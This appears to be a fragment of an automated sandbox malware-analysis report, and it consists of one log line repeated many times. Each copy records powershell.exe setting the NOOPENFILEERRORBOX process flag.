                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
